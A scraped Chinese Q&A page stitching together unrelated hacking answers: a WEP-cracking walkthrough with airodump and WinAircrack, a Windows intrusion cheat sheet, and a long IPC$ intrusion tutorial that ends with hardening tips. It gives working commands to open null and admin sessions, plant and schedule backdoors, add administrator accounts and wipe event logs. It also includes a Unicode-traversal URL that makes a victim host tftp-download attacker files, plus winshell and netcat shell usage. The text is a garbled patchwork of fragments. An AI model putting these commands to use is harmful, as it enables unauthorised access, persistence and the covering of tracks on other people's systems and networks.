[SVCH0ST] <C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\SVCH0ST.EXE>
[SVCH0ST] <C:\Documents and Settings\a\「開始」菜單\程序\啟動\SVCH0ST.EXE>

啟動項目 -- 服務-- 驅動程序之如下項禁用:
[xpvidpf / xpvidpf] <system32\drivers\xpvidpf.sys>

映像挾持任務管理器???可能是改了注冊表或有進程文件監控
SRE,usbcleaner,金山清理專家都有修復任務管理器的功能

9. 如何獲取本機存儲的無線網密碼 如果回答的答案正確追加分數!!!

需要WinAircrackPack
該工具包是一個無線工具的組合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airomp.exe四個程序,這些程序各有各的用。
SSID號發現工具就是airomp.exe。對付 SSID影藏
第一步:解壓縮下載的工具包,運行里頭的airomp.exe
第二步:選擇相應的網卡,輸入對應無線網卡前的序號
第三步:輸入o或者a選擇網卡模式,
第四步:選擇搜索頻段,輸入0是代表所有頻段都檢測的意思。
第五步:接下來會提示你輸入一個保存文件,這樣該工具會把所有sniffer下來的數據包放到這個文件中
第六步:only write wep ivs是否只檢測WEP加密數據包,我們選擇「Y」即可。
第七步:這時會出現一個提示,大概意思就是說目前驅動還不支持,無法進行sniffer的操作。同時瀏覽器會自動轉到一個頁面,我們可以通過這個頁面下載兼容驅動程序,升級我們的無線網卡讓sniffer工具——airomp.exe可以順利運行

(2)下載無線網卡新驅動:
要想下載合適的無線網卡新驅動就需要到前面提到的那個跳轉頁面了。
第一步:打開的頁面地址為http://www.wildpackets.com/support/proct_support/airopeek/hardware,我們通過這個地址下載適合自己網卡的可以使用airomp的驅動。
第二步:在搜索設備頁面中選擇自己無線網卡的品牌和型號。筆者選擇tp-link的所有無線產品進行查詢,看看應該下載哪個驅動
第三步:在查詢結果頁面中我們可以看到自己的網卡應該使用該站點提供的AR5005G驅動來使用airomp
四步:再次返回http://www.wildpackets.com/support/proct_support/airopeek/hardware頁面,你會在該頁內容上看到關於該驅動所兼容的atheros卡型號,裡面會提到ar5005,雖然我們的是ar5005g但是可以使用。點該頁面下方的the wildpackets atheros wireless driver v4.2鏈接進行下載即可
第五步:下載wildpackets atheros wireless driver v4.2驅動到本地硬碟。
第六步:打開後裡面有三個文件,我們的無線網卡升級工作就要靠這三個文件。
(3)安裝無線網卡新驅動:
之前下載的wildpackets atheros wireless driver v4.2壓縮包里的三個文件就是我們安裝驅動的主角。
第一步:在桌面網上鄰居圖標上點滑鼠右鍵,並選擇屬性。
第二步:在自己的無線網卡對應的本地連接上點滑鼠右鍵,並選擇屬性。
第三步:在無線網路連接屬性窗口中的「常規」標簽下點網卡信息旁邊的「配置」按鈕。
第四步:在「驅動程序」標簽中點「更新驅動程序」按鈕。
第五步:系統將出現硬體安裝向導,我們選擇「從列表或指定位置安裝(高級),然後點「下一步」按鈕
第六步:然後選擇「不要搜索,我要自己選擇要安裝的驅動程序」,點「下一步」按鈕繼續。
七步:由於之前我們安裝的驅動是*****無線網卡的官方驅動,所以系統默認會找到相應的驅動,我們不選擇他們,點「從磁碟安裝」。
第八步:通過「瀏覽」按鈕找到我們下載並解壓縮的wildpackets atheros wireless driver v4.2文件保存目錄。
第九步:選擇atheros ar5005g cardbus wireless network adapter,點「下一步」繼續
第十步:在安裝驅動過程中會出現兼容性提示,我們點「仍然繼續」即可。
第十一步:系統復制必須文件到本地磁碟
第十二步:完成硬體更新向導,我們的TP-LINK無線網卡現在已經變成了atheros ar5005g無線網卡了,這樣才能夠使用airomp這個無線網路sniffer工具。
四、總 結:
由於WEP破解的准備工作比較多,已經成功的將自己的網卡進行了更新驅動工作,這也是WEP加密破解的關鍵,

開始 輕松破解無線網路WEP
一、使用airomp抓取無線網路數據包並破解SSID名稱:
不管是找出已經禁用了SSID號廣播的無線網路還是進行WEP解密工作,我們首先要做的就是通過無線網路sniffer工具——airomp來監視無線網路中的數據包。
第一步:打開文章中下載的winaircrackpack壓縮包解壓縮的目錄。
第二步:運行airomp.exe程序,這個就是我們的sniffer小工具,他的正常運行是建立在我們無線網卡已經更新驅動的基礎上。
第三步:這時你會發現顯示的信息和安裝驅動前已經不同了,我們的***網卡名稱已經變為13 atheros ar5005g cardbus wireless network adapter,也就是說他成功更新為與atheros兼容的硬體了。我們輸入其前面的數字13即可。
第四步:接下來是選擇無線網卡的類型,既然說了是與atheros相兼容的,所以直接輸入「a」進行選擇即可。
第五步:上面文章中提到了已經把無線網路的SSID廣播功能取消了,這樣我們假設還不知道該無線設備使用的哪個頻段和SSID號。在這里輸入0,這樣將檢測所有頻段的無線數據包。
實際上要想知道一個無線網路使用的頻段是非常簡單的,可以使用無線網卡管理配置工具,就像上文提到的那樣,可以知道該無線網路使用的速度和頻段,但是無法檢測出SSID號。
第六步:同樣輸入一個保存數據包信息的文件,例如輸入softer。這樣可以把檢測到的數據包以及統計信息一起寫到這個文件中,並為使用其他工具提供基礎保證。
第七步:是否只收集wep數據信息,我們點N」。這樣將檢測網路中的所有數據包不只WEP加密數據。
第八步:最後airomp會自動檢測網路中的所有頻段,對無線網路中的無線數據包進行統計和分析。
第九步:當統計的數據包比較多的時候,就可以自動分析出無線網路對應的SSID號和無線設備的MAC地址以及無線速度,發射頻段和是否加密,採用何種方式加密了,是不是非常神氣?例如設置的無線網路SSID號為softer,剛開始圖7中統計時還沒有檢測出來,當數據達到一定數量後例如DATA處為 15651時就可以看到ESSID號即SSID號為softer了。
至此我們成功的實現了通過airomp找到沒有開啟SSID廣播功能的無線網路對應的SSID號,所以說僅僅報著將SSID號隱藏並修改默認名字是不能阻止非法入侵者連接無線網路的。不管你是否開啟SSID廣播,我們都可以通過無線網路的sniffer工具來找出你的真實SSID名稱。
不過有一點要特別注意,那就是是否能夠破解SSID名稱是建立在airomp搜集到足夠的數據包基礎上的,也就是說也可能你的無線路由器開著,但是沒有任何無線網卡和他通訊,這樣airomp是無法檢測到任何無線數據包並進行分析破解的。筆者在寫本文進行的實驗環境也是如此,那另外一塊TP-LINK無線網卡510G安裝在一台聯想筆記本上並不停的通過無線路由器進行BT下載來保持總是不斷有無線數據傳輸,這樣才可以加快破解進程。
另外當數據包沒有收集足夠多的情況下,airomp會出現錯誤信息,例如本來是WEP加密方式的無線網路,可能會檢測為WPA。用戶只需要多等些時間讓airomp收集足夠多的數據就可以保證顯示結果的真實性了。

二、使用WinAircrack破解WEP密文:
雖然我們可以通過airomp來檢測無線網路的基本信息,包括發射頻段,無線網路的SSID名稱,無線速度等。但是對於那些使用WEP加密了的無線網路就無能為力了,即使我們知道了無線網路的SSID號如果沒有WEP加密密文的話,依然無法連接到該網路。
不過airomp收集到的信息也是非常寶貴的,我們可以通過另外一個工具來分析出WEP密文。該工具的名稱是WinAircrack,當然在用 WinAircrack破解airomp收集到的信息前一定保證airomp收集的信息量要大,信息越多破解越不容易出問題,而且破解成功所需時間越短。
第一步:打開下載的壓縮包,運行裡面的winaircrack.exe程序。
第二步:在左邊找到general,接下來點GENERAL界面中下方的click here to locate capture file...,讓我們選擇一個捕獲文件。
第三步:這個文件就是上面所提到的airomp保存下來的數據統計文件,第九步中已經為其起了一個名字叫softer了,那麼我們到airomp.exe所在文件夾中找到softer.cap文件,這個文件就是捕獲文件。
第四步:回到general界面,在encryption type處選擇WEP。
第五步:在左邊點WEP,在WEP設置標簽中先檢測64位密文,key index保持自動AUTO。因為大部分用戶在設置無線路由器WEP加密時都選擇了最簡單的64位密文,他也是破解所需時間最短的。
第六步:設置完畢點右下角的「aircrack the key...」按鈕,winaircrack會自動根據softer.cap中保存的統計信息進行分析,暴力破解WEP密文。
第七步:由於採取的是暴力破解方法,所以花費的時間會比較多,大概需要幾個小時甚至更多的時間來破解一個64位的WEP密文。當發現WEP密文後會顯示出內容.

不過在實際操作過程中需要的時間會比較長,特別是當WEP密文設置的比較復雜時,例如使用多個數字或者增加加密位數達到128位等。
另外通過airomp來收集無線數據傳輸包也是關鍵,也許對方開著路由器但並沒有和網卡進行大流量數據傳輸,這樣即使你開啟airomp收集了幾個小時,都可能出現無法獲得足夠數據包問題。
僅僅是為了和大家交流,希望大家不要使用本文介紹的方法去入侵別人的無線網,
大家能夠明白WEP加密也不是百分之百安全,所以應該盡量使用WPA安全加密方式。

--------------------------------------------------------------------------------

無線網路密碼破解
面的工具可以幫助你。你有點電腦基礎的話,很容易搞到密碼的。

Kismet:一款超強的無線嗅探器

NetStumbler:免費的Windows 802.11嗅探器

GFI LANguard:一款Windows平台上的商業網路安全掃描器

Airsnort:802.11 WEP加密破解工具

無非是掃描 嗅探 破解

與遠程主機建立空管連接) net use \\IP地址\ipc$ "" /use:""

(以管理員身份登錄遠程主機) net use \\IP地址\ipc$ "密碼" /use:"Administrator"

(傳送文件到遠程主機WINNT目錄下) 本機目錄路徑\程序 \\IP地址\admin$

(查看遠程主機時間) net time \\IP地址

(定時啟動某個程序) at \\IP地址 02:18 readme.exe

(查看共享) net view \\IP地址

(查看netbios工作組列表) nbtstat -A IP地址

(將遠程主機C盤映射為自己的F盤) net use f: \\IP地址\c$ ""/user:"Administrator"

(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add

net localgroup Administrators 用戶名 /add

(斷開連接) net use \\IP地址\ipc$ /delete

=====================================================

擦屁屁:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

============================

一、netsvc.exe

下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的「時間任務」服務:

netsvc /list \\IP地址

netsvc schele \\IP地址 /query

netsvc \\IP地址 schele /start

二、OpenTelnet.exe

遠程啟動主機的Telnet服務,並綁定埠到7878,例如:

OpenTelnet \\IP地址 用戶名 密碼 1 7878

然後就可以telnet到主機的7878埠,進入DOS方式下:

telnet IP地址 7878

三、winshell.exe

一個非常小的木馬(不到6K),telnet到主機的7878埠,輸入密碼winshell,當看到CMD>後,可打下面的命令:

p Path (查看winshell主程序的路徑信息)

b reBoot (重新啟動機器)

d shutDown (關閉機器)

s Shell (執行後你就會看到可愛的「C:\>」)

x eXit (退出本次登錄會話,此命令並不終止winshell的運行)

CMD> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)

四、3389登陸器,GUI方式登錄遠程主機的

五、elsave.exe

事件日誌清除工具

elsave -s \\IP地址 -l "application" -C

elsave -s \\IP地址 -l "system" -C

elsave -s \\IP地址 -l "security" -C

執行後成功清除應用程序日誌,系統日誌,安全日誌

六、hbulot.exe

開啟win2kserver和winxp的3389服務

hbulot [/r]

使用/r表示安裝完成後自動重起目標使設置生效。

七、nc.exe(netcat.exe)

一個很好的工具,一些腳本程序都要用到它,也可做溢出後的連接用。

想要連接到某處: nc [-options] hostname port[s] [ports] ...

綁定埠等待連接: nc -l -p port [-options] [hostname] [port]

參數:

-e prog 程序重定向,一旦連接,就執行 [危險!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 幫助信息

-i secs 延時的間隔

-l 監聽模式,用於入站連接

-n 指定數字的IP地址,不能用hostname

-o file 記錄16進制的傳輸

-p port 本地埠號

-r 任意指定本地及遠程埠

-s addr 本地源地址

-u UDP模式

-v 詳細輸出——用兩個-v可得到更詳細的內容

-w secs timeout的時間

-z 將輸入輸出關掉——用於掃描時

八、TFTPD32.EXE

把自己的電腦臨時變為一台FTP伺服器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名

然後可以直接令文件運行:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、 prihack.exe是IIS的printer遠程緩沖區溢出工具。idqover.exe是溢出idq的,選擇「溢出後在一個埠監聽」,然後用 telnet連接它的監聽埠,如果溢出成功,一連它的埠,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以後winxp 下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行許可權的目錄。然後用IE瀏覽器連接。

一、一 Xscan命令行運行參數說明:

在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據後提前退出程序,按""強行關閉程序。

1.命令格式: xscan -host [-] [其他選項]

xscan -file [其他選項]

其中 含義如下:

-port : 檢測常用服務的埠狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定製待檢測埠列表);

-ftp : 檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);

-ntpass : 檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);

-cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);

-iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);

[其他選項] 含義如下:

-v: 顯示詳細掃描進度

-p: 跳過Ping不通的主機

-o: 跳過沒有檢測到開放埠的主機

-t : 指定最大並發線程數量和並發主機數量, 默認數量為100,10

採納我吧 謝謝

10. 空連接的關於操作

首先我們來了解一些基礎知識:
1 SMB:(Server Message Block) Windows 協議族,用於文件列印共享的服務;
2 NBT:(NETBios Over TCP/IP) 使用 137 ( UDP ) 138 ( UDP ) 139 ( TCP )埠實現基於 TCP/IP 協議的 NETBIOS網路互聯。
3 在 WindowsNT 中 SMB 基於 NBT 實現,即使用 139 ( TCP )埠;而在 Windows2000 中, SMB 除了基於 NBT 實現,還可以直接通過 445 埠實現。
有了這些基礎知識,我們就可以進一步來討論訪問網路共享對埠的選擇了:
對於 win2000客戶端(發起端)來說:
1 如果在允許 NBT 的情況下連接伺服器時,客戶端會同時嘗試訪問 139 和 445 埠,如果 445 埠有響應,那麼就發送 RST 包給 139 埠斷開連接,用 455 埠進行會話,當 445 埠無響應時,才使用 139 埠,如果兩個埠都沒有響應,則會話失敗;
2 如果在禁止 NBT 的情況下連接伺服器時,那麼客戶端只會嘗試訪問 445 埠,如果 445 埠無響應,那麼會話失敗。
對於 win2000 伺服器端來說:
1 如果允許 NBT, 那麼 UDP 埠 137, 138, TCP 埠 139, 445 將開放( LISTENING );
2 如果禁止 NBT ,那麼只有 445 埠開放。
我們建立的 ipc$ 會話對埠的選擇同樣遵守以上原則。顯而易見,如果遠程伺服器沒有監聽 139 或 445 埠, ipc$ 會話是無法建立的。 以下是一些常見的導致 ipc$ 連接失敗的原因:
1 IPC 連接是 Windows NT 及以上系統中特有的功能,由於其需要用到 Windows NT 中很多 DLL 函數,所以不能在 Windows 9.x/Me 系統中運行,也就是說只有 nt/2000/xp 才可以相互建立 ipc$ 連接, 98/me 是不能建立 ipc$ 連接的;
2 如果想成功的建立一個 ipc$ 連接,就需要響應方開啟 ipc$ 共享,即使是空連接也是這樣,如果響應方關閉了 ipc$ 共享,將不能建立連接;
3 連接發起方未啟動 Lanmanworkstation 服務(顯示名為: Workstation ):它提供網路鏈結和通訊,沒有它發起方無法發起連接請求;
4 響應方未啟動 Lanmanserver 服務(顯示名為: Server ):它提供了 RPC 支持、文件、列印以及命名管道共享, ipc$ 依賴於此服務,沒有它主機將無法響應發起方的連接請求,不過沒有它仍可發起 ipc$ 連接;
5 響應方未啟動 NetLogon ,它支持網路上計算機 pass-through 帳戶登錄身份(不過這種情況好像不多);
6 響應方的 139 , 445 埠未處於監聽狀態或被防火牆屏蔽;
7 連接發起方未打開 139 , 445 埠;
8 用戶名或者密碼錯誤:如果發生這樣的錯誤,系統將給你類似於 ' 無法更新密碼 ' 這樣的錯誤提示(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號 即可;
10 如果在已經建立好連接的情況下對方重啟計算機,那麼 ipc$ 連接將會自動斷開,需要重新建立連接。
另外 , 你也可以根據返回的錯誤號分析原因:
錯誤號 5 ,拒絕訪問:很可能你使用的用戶不是管理員許可權的;
錯誤號 51 , Windows 無法找到網路路徑:網路有問題;
錯誤號 53 ,找不到網路路徑: ip 地址錯誤;目標未開機;目標 lanmanserver 服務未啟動;目標有防火牆(埠過濾);
錯誤號 67 ,找不到網路名:你的 lanmanworkstation 服務未啟動或者目標刪除了 ipc$ ;
錯誤號 1219 ,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個 ipc$ ,請刪除再連;
錯誤號 1326 ,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號 1792 ,試圖登錄,但是網路登錄服務沒有啟動:目標 NetLogon 服務未啟動;
錯誤號 2242 ,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。 有些朋友雖然成功的建立了 ipc$ 連接,但在 時卻遇到了這樣那樣的麻煩,無法復製成功,那麼導致復制失敗的常見原因又有哪些呢?
1. 對方未開啟共享文件夾
這類錯誤出現的最多,佔到 50% 以上。許多朋友在 ipc$ 連接建立成功後,甚至都不知道對方是否有共享文件夾,就進行盲目復制,結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用 net view\IP這個命令看一下你想要復制的共享文件夾是否存在(用軟體查看當然更好),不要認為能建立 ipc$ 連接就一定有共享文件夾存在。
2. 向默認共享復制失敗
這類錯誤也是大家經常犯的,主要有兩個小方面:
1)錯誤的認為能建立 ipc$ 連接的主機就一定開啟了默認共享,因而在建立完連接之後馬上向 c$,d$,admin$ 之類的默認共享復制文件,一旦對方未開啟默認共享,將導致復制失敗。 ipc$ 連接成功只能說明對方打開了 ipc$ 共享,並不能說明默認共享一定存在。 ipc$ 共享與默認共享是 兩碼 事, ipc$ 共享是一個命名管道,並不是哪個實際的文件夾,而默認共享卻是實實在在的共享文件夾;
2)由於 net view\IP這個命令無法顯示默認共享文件夾(因為默認共享帶 $ ),因此通過這個命令,我們並不能判斷對方是否開啟了默認共享,因此如果對方未開啟默認共享,那麼所有向默認共享進行的操作都不能成功;(不過大部分掃描軟體在掃弱口令的同時,都能掃到默認共享目錄,可以避免此類錯誤的發生)
要點:請大家一定區分 ipc 共享,默認共享,普通共享這三者的區別: ipc 共享是一個管道,並不是實際的共享文件夾;默認共享是安裝時默認打開的文件夾;普通共享是我們自己開啟的可以設置許可權的共享文件夾。
3. 用戶許可權不夠,包括四種情形:
1 )空連接向所有共享(默認共享和普通共享)復制時,許可權是不夠的;
2 )向默認共享復制時,在 Win2000 Pro 版中,只有 Administrators 和 Backup Operators 組成員才可以,在 Win2000 Server 版本 Server Operatros 組也可以訪問到這些共享目錄;
3 )向普通共享復制時,要具有相應許可權(即對方管理員事先設定的訪問許可權);
4 )對方可以通過防火牆或安全軟體的設置,禁止外部訪問共享;
注意:
A. 不要認為 administrator 就一定具有管理員許可權,管理員名稱是可以改的
B. 管理員可以訪問默認共享的文件夾,但不一定能夠訪問普通的共享文件夾,因為管理員可以對普通的共享文件夾進行訪問許可權設置,管理員為 D 盤設置的訪問許可權為僅允許名為 xinxin 的用戶對該文件夾進行完全訪問,那麼此時即使你擁有管理員許可權,你仍然不能訪問 D 盤。不過有意思的是,如果此時對方又開啟了 D$ 的默認共享,那麼你卻可以訪問 D$ ,從而繞過了許可權限制,有興趣的朋友可以自己做測試。
4. 被防火牆殺死或在區域網
還有一種情況,那就是也許你的復制操作已經成功,但當遠程運行時,被防火牆殺掉了,導致找不到文件;或者你把木馬復制到了區域網內的主機,導致連接失敗(反向連接的木馬不會發生這種情況)。如果你沒有想到這種情況,你會以為是復制上出了問題,但實際你的復制操作已經成功了,只是運行時出了問題。 本來還想說一下用 at 遠程運行程序失敗的原因,但考慮到 at 的成功率不是很高,問題也很多,在這里就不提它了(提的越多,用的人就越多),而是推薦大家用 psexec.exe 遠程運行程序,假設想要遠程機器執行本地 c: xin.exe 文件,且管理員為 administrator ,密碼為 1234 ,那麼輸入下面的命令:
psexec\ip-u administrator -p 1234 -c c: xin.exe
如果已經建立 ipc 連接,則 -u -p 這兩個參數不需要, psexec.exe 將自動拷貝文件到遠程機器並運行。
本來 xp 中的 ipc$ 也不想在這里討論,想單獨拿出來討論,但看到越來越多的朋友很急切的提問為什麼遇到 xp 的時候,大部分操作都很難成功。我在這里就簡單提一下吧,在 xp 的默認安全選項中,任何遠程訪問僅被賦予來賓許可權,也就是說即使你是用管理員帳戶和密碼,你所得到的許可權也只是 Guest ,因此大部分操作都會因為許可權不夠而失敗,而且到目前為止並沒有一個好的辦法來突破這一限制。所以如果你真的得到了 xp 的管理員密碼,我建議你盡量避開 ipc 管道。 目標的 ipc$ 不是輕易就能打開的,否則就要天下打亂了。你需要一個 admin 許可權的 shell ,比如 telnet ,木馬, cmd 重定向等,然後在 shell 下執行:
net share ipc$
開放目標的 ipc$ 共享;
net share ipc$ /del
關閉目標的 ipc$ 共享;如果你要給它開共享文件夾,你可以用:
net share xinxin=c:
這樣就把它的 c 盤開為共享名為 xinxin共享文件夾了。(可是我發現很多人錯誤的認為開共享文件夾的命令是 net share c$ ,還大模大樣的給菜鳥指指點點,真是誤人子弟了)。再次聲明,這些操作都是在 shell 下才能實現的。 看到很多教程這方面寫的十分不準確,一些需要 shell 才能完成命令就簡簡單單的在 ipc$ 連接下執行了,起了誤導作用。那麼下面我總結一下需要在 shell 才能完成的命令:
1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在 shell 下完成;
2 打開遠程主機的 ipc$ 共享,默認共享,普通共享的操作需要在 shell 下完成;
3 運行 / 關閉遠程主機的服務,需要在 shell 下完成;
4 啟動 / 殺掉遠程主機的進程,也需要在 shell 下完成(用軟體的情況下除外,如 pskill )。
入侵中可能會用到的命令
為了這份教程的完整性,我列出了 ipc$ 入侵中的一些常用命令,如果你已經掌握了這些命令,你可以跳過這一部分看下面的內容。請注意這些命令是適用於本地還是遠程,如果只適用於本地,你只能在獲得遠程主機的 shell (如 cmd , telnet 等)後,才能向遠程主機執行。
1 建立 / 刪除 ipc$ 連接的命令
1 )建立空連接 :
net use\127.0.0.1ipc$ /user:
2 )建立非空連接 :
net use\127.0.0.1ipc$ 密碼 /user: 用戶名
3 )刪除連接 :
net use\127.0.0.1ipc$/del
2 在 ipc$ 連接中對遠程主機的操作命令
1 ) 查看遠程主機的共享資源(看不到默認共享) :
net view\127.0.0.1
2 ) 查看遠程主機的當前時間 :
net time\127.0.0.1
3 ) 得到遠程主機的 netbios 用戶名列表 :
nbtstat -A 127.0.0.1
4 )映射 / 刪除遠程共享 :
net use z:\127.0.0.1c
此命令將共享名為 c 的共享資源映射為本地 z 盤
net use z: /del
刪除映射的 z 盤,其他盤類推
5 )向遠程主機復制文件 :
路徑 文件名\IP共享目錄名,如:
c: xin.exe\127.0.0.1c$即將 c 盤下的 xinxin.exe 復制到對方 c 盤內
當然,你也可以把遠程主機上的文件復制到自己的機器里:
\127.0.0.1c$ xin.exec:
6 )遠程添加計劃任務 :
at\IP時間 程序名 如:
at\127.0.0.011:00 xinxin.exe
注意:時間盡量使用 24 小時制;如果你打算運行的程序在系統默認搜索路徑(比如 system32/ )下則不用加路徑,否則必須加全路徑
3 本地命令
1 )查看本地主機的共享資源(可以看到本地的默認共享)
net share
2 )得到本地主機的用戶列表
net user
3 )顯示本地某用戶的帳戶信息
net user帳戶名
4 )顯示本地主機當前啟動的服務
net start
5 )啟動 / 關閉本地服務
net start 服務名
net stop 服務名
6 )在本地添加帳戶
net user帳戶名密碼 /add
7 )激活禁用的用戶
net uesr帳戶名/active:yes
8 )加入管理員組
net localgroup administrators帳戶名/add
很顯然的是,雖然這些都是本地命令,但如果你在遠程主機的 shell 中輸入,比如你 telnet 成功後輸入上面這些命令,那麼這些本地輸入將作用在遠程主機上。
4 其他一些命令
1 ) telnet
telnet IP 埠
telnet 127.0.0.0 23
2 )用 opentelnet.exe 開啟遠程主機的 telnet
OpenTelnet.exe\ip管理員帳號 密碼 NTLM 的認證方式 port
OpenTelnet.exe\127.0.0.1administrator 1 90
不過這個小工具需要滿足四個要求:
1 )目標開啟了 ipc$ 共享
2 )你要擁有管理員密碼和帳號
3 )目標開啟 RemoteRegistry 服務,用戶就可以更改 ntlm 認證
4 )對僅 WIN2K/XP 有效
3 )用 psexec.exe 一步獲得 shell ,需要 ipc 管道支持
psexec.exe\IP-u 管理員帳號 -p 密碼 cmd
psexec.exe\127.0.0.1-u administrator -p cmd
對比過去和現今的 ipc$ 入侵
既然是對比,那麼我就先把過去的 ipc$ 入侵步驟寫給大家,都是蠻經典的步驟:
[1]
C:>net use\127.0.0.1ipc$ /user:admintitrators
\ 用掃到的空口令建立連接
[2]
c:>net view\127.0.0.1
\ 查看遠程的共享資源
[3]
C:> srv.exe\127.0.0.1admin$system32
\ 將一次性後門 srv.exe 復制到對方的系統文件夾下,前提是 admin$ 開啟
[4]
C:>net time\127.0.0.1
\ 查看遠程主機的當前時間
[5]
C:>at\127.0.0.1時間 srv.exe
\ 用 at 命令遠程運行 srv.exe ,需要對方開啟了 'Task Scheler' 服務
[6]
C:>net time\127.0.0.1
\ 再次查看當前時間來估算 srv.exe 是否已經運行,此步可以省略
[7]
C:>telnet 127.0.0.1 99
\ 開一個新窗口,用 telnet遠程登陸到 127.0.0.1 從而獲得一個 shell( 不懂 shell 是什麼意思?那你就把它想像成遠程機器的控制權就好了,操作像 DOS) , 99 埠是 srv.exe 開的一次性後門的埠
[8]
C:WINNTsystem32>net start telnet
\ 我們在剛剛登陸上的 shell 中啟動遠程機器的 telnet 服務,畢竟 srv.exe 是一次性的後門,我們需要一個長久的後門便於以後訪問,如果對方的 telnet 已經啟動,此步可省略
[9]
C:> ntlm.exe\127.0.0.1admin$system32
\ 在原來那個窗口中將 ntlm.exe 傳過去, ntlm.exe 是用來更改 telnet身份驗證的
[10]
C:WINNTsystem32>ntlm.exe
\ 在 shell 窗口中運行 ntlm.exe ,以後你就可以暢通無阻的 telnet 這台主機了
[11]
C:>telnet 127.0.0.1 23
\ 在新窗口中 telnet 到 127.0.0.1 ,埠 23 可省略,這樣我們又獲得一個長期的後門
[12]
C:WINNTsystem32>net user 帳戶名 密碼 /add
C:WINNTsystem32>net uesr guest /active:yes
C:WINNTsystem32>net localgroup administrators 帳戶名 /add
\telnet上以後,你可以建立新帳戶,激活 guest ,把任何帳戶加入管理員組等
好了,寫到這里我似乎回到了 2 , 3 年前,那時的 ipc$ 大家都是這么用的,不過隨著新工具的出現,上面提到的一些工具和命令已經不常用到了,那就讓我們看看高效而簡單的 ipc$ 入侵吧。
[1] psexec.exe\IP-u 管理員帳號 -p 密碼 cmd
\ 用這個工具我們可以一步到位的獲得 shell
OpenTelnet.exe\server管理員帳號 密碼 NTLM 的認證方式 port
\ 用它可以方便的更改 telnet 的驗證方式和埠,方便我們登陸
[2] 已經沒有第二步了,用一步獲得 shell 之後,你做什麼都可以了,安後門可以用 winshell ,克隆就用 ca 吧,開終端用 3389.vbe ,記錄密碼用 win2kpass ,總之好的工具不少,隨你選了,我就不多說了。 1 禁止空連接進行枚舉 ( 此操作並不能阻止空連接的建立 )
運行 regedit ,找到如下主鍵 [HKEY_LOCAL_] 把 RestrictAnonymous = DWORD 的鍵值改為: 1
如果設置為 1 ,一個匿名用戶仍然可以連接到 IPC$ 共享,但無法通過這種連接得到列舉 SAM 帳號和共享信息的許可權;在 Windows 2000 中增加了 2 ,未取得匿名權的用戶將不能進行 ipc$ 空連接。建議設置為 1 。如果上面所說的主鍵不存在,就新建一個再改鍵值。如果你覺得改注冊表麻煩,可以在本地安全設置中設置此項: 在本地安全設置-本地策略-安全選項- ' 對匿名連接的額外限制 '
2 禁止默認共享
1 )察看本地共享資源
運行 -cmd- 輸入 net share
2 )刪除共享(重起後默認共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (如果有 e,f, ……可以繼續刪除)
3 )停止 server 服務
net stop server /y (重新啟動後 server 服務會重新開啟)
4 )禁止自動打開默認共享(此操作並不能關閉 ipc$ 共享)
運行 -regedit
server 版與pro 版 : 找到如下主鍵 [HKEY_LOCAL_] 把 AutoShareServer ( DWORD )的鍵值改為 :00000000 。
這兩個鍵值在默認情況下在主機上是不存在的,需要自己手動添加,修改後重起機器使設置生效。
3 關閉 ipc$ 和默認共享依賴的服務 :server 服務
如果你真的想關閉 ipc$ 共享,那就禁止 server 服務吧:
控制面板- 管理工具 - 服務 - 找到 server 服務(右擊) - 屬性 - 常規 - 啟動類型 - 選已禁用,這時可能會有提示說: XXX 服務也會關閉是否繼續,因為還有些次要的服務要依賴於 server 服務,不要管它。
4 屏蔽 139 , 445 埠
由於沒有以上兩個埠的支持,是無法建立 ipc$ 的,因此屏蔽 139 , 445 埠同樣可以阻止 ipc$ 入侵。
1 ) 139 埠可以通過禁止 NBT 來屏蔽
本地連接- TCP/IT 屬性-高級- WINS -選『禁用 TCP/IT 上的 NETBIOS '一項
2 ) 445 埠可以通過修改注冊表來屏蔽
添加一個鍵值
Hive: HKEY_LOCAL_MACHINE
Key:
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完後重啟機器
注意:如果屏蔽掉了以上兩個埠,你將無法用 ipc$ 入侵別人。
3 )安裝防火牆進行埠過濾
6 設置復雜密碼,防止通過 ipc$ 窮舉出密碼,我覺得這才是最好的辦法,增強安全意識,比不停的打補丁要安全的多。

閱讀全文

與winshell文件夾相關的資料

熱點內容
dvd光碟存儲漢子演算法 瀏覽:757
蘋果郵件無法連接伺服器地址 瀏覽:962
phpffmpeg轉碼 瀏覽:671
長沙好玩的解壓項目 瀏覽:142
專屬學情分析報告是什麼app 瀏覽:564
php工程部署 瀏覽:833
